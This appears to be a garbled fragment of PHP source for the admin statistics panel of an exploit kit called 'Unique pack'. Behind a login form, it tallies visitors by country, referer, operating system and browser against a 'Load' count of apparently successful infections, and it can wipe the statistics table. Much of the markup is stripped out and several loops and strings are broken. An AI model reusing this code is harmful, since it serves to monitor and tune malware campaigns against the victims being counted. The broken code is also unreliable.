Unique pack

Username:

Password:


Unique pack (c) Security

\n\n\tUnique pack\n\t\n\n\n"; echo "\t
\n\t\t\n\t
\n"; echo "\t

\n"; echo "\t\t\n"; echo "\t\t\n"; echo "\t\t\n"; echo "\t\t\n"; echo "\t\t\n"; echo "\t

\n"; if(isset($_GET['clear'])) { $sql = 'TRUNCATE `statistic`'; mysql_query($sql); echo "\t
Clear successfully!
\n"; echo "\n"; } elseif (isset($_GET['country'])) { echo "\t\n"; $sql = 'select country, count(*) as total from statistic where good=1 group by country'; $r = mysql_query($sql); while ($l = mysql_fetch_array($r)) { $br[$l['country']]=$l['total']; } $sql = 'SELECT country, COUNT(*) AS total FROM statistic GROUP BY country ORDER BY total DESC'; $r = mysql_query($sql); echo "\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\n"; while ($Row = mysql_fetch_array($r)) { if(@$br[$Row['country']]){$ass = $br[$Row['country']];} else {$ass = 0;}; echo "\t\t\n\t\t\t\n"; echo "\t\t\t\n"; echo "\t\t\t\n"; echo "\t\t\t\n\t\t\n"; } echo "\t
CountryAllLoad%
".$Row['country']."".$Row['total']."".$ass."".round($ass/$Row['total']*100, 2)." %
\n\n"; }elseif (isset($_GET['refer'])){ echo "\t\n"; $sql = 'select refer, count(*) as total from statistic group by refer'; $r = mysql_query($sql); while ($Row = mysql_fetch_array($r)) { if ($Row['refer']=="") { $Row['refer']="Without referer"; } echo "\t\t\n"; echo "\t\t\t\n"; echo "\t\t\t\n\t\t\n"; } echo "\t
".$Row['refer']."".$Row['total']."
\n\n"; }else{ $sql = 'select os, count(*) as total from statistic group by os'; $r = mysql_query($sql); $Row = mysql_fetch_array($r); if($Row==0){ echo "\t
Statistics is not specified
Probably you have dumped it
\n"; exit(); } ?> \r\n\t\t\n"; $sql = 'select os, count(*) as total from statistic group by os'; $r = mysql_query($sql); echo "\t\t\tOperating system:\n\t\t\tAll\r\n\t\t\n"; while ($Row = mysql_fetch_array($r)) { echo "\t\t\n\t\t\t".$Row['os']."\n"; echo "\t\t\t".$Row['total']."\n\t\t\r\n"; } echo "\t\r\n"; echo "\t\n"; echo "\t\t\n\t\t\t\n"; echo "\t\t\t\n"; echo "\t\t\r\n"; $sql_se = 'select br from statistic group by br'; $q_se = mysql_query($sql_se); $aa=0; $lb=array(); while ($row_bro=mysql_fetch_array($q_se)) { if (strstr($row_bro['br']," ")) { $list_browser=explode(" ",$row_bro['br']); if (!in_array($list_browser[0], $lb)) { $lb[]=$list_browser[0]; } }else{ if (!in_array($row_bro['br'], $lb)) { $lb[]=$row_bro['br']; } } $aa++; } $aa=0; $sum_total=0; $sum_good=0; while ($aa"; echo "
Browser:All/Load
"; echo "
"; echo "".$lb[$aa]."
".$lb_hits['total']."/".$lb_hits_good['total']."
\r\n"; echo "\t\n"; echo "\t\t\n\t\t\t\n"; echo "\t\t\t\n"; echo "\t\t\n\t
"; echo "\n"; }